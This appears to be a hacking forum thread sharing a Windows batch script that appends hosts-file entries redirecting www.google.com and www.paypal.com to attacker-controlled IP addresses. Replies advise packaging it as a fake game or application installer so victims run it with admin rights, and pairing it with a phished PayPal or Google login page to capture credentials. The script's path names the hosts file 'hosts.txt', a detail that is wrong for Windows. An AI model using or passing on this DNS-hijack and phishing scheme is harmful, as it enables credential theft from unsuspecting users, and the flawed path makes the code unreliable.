DNS Poisoning with batch #1
Hey guys,
just a few lines of code to create a batch file that does some serious DNS poisoning.
remember to save as .bat:

@echo off
echo 10.199.64.66 www.google.com >> C:\windows\system32\drivers\etc\hosts.txt
echo 10.199.64.67 www.paypal.com >> C:\windows\system32\drivers\etc\hosts.txt
exit

Requires admin privileges on the shell.

If you have the access to run this(or have it run) you have the access to do it in a much more subtle way with malware to hook the DNS responses and to get a much more persistent foothold into the target system.

true ..or you could just change this batch file into an exe file, give it an icon, and send it to someone as a setup for a game or application, the person will obviously run it with admin privileges. Smile

awesome code if you have admin. don't forget the code tags.

Good one, but it should be used wisely.
It creates a new entry in the hosts file, so that whenever a user attempts to open to www.google.com, he will be re-directed to another host that has the IP address of 10.199.64.66, likewise if the user attempts to login to the paypal account by typing in www.paypal.com, he will be re-directed to another external bogus website that has the IP address of 10.199.64.67, where if the user enters the credentials unknowingly, they were into the hackers database and he can use it for several other purposes.
You got to create a phished login page for paypal or google or whatever you want. Just using the above IP won't help you.
And yes, you got to have admin privileges.
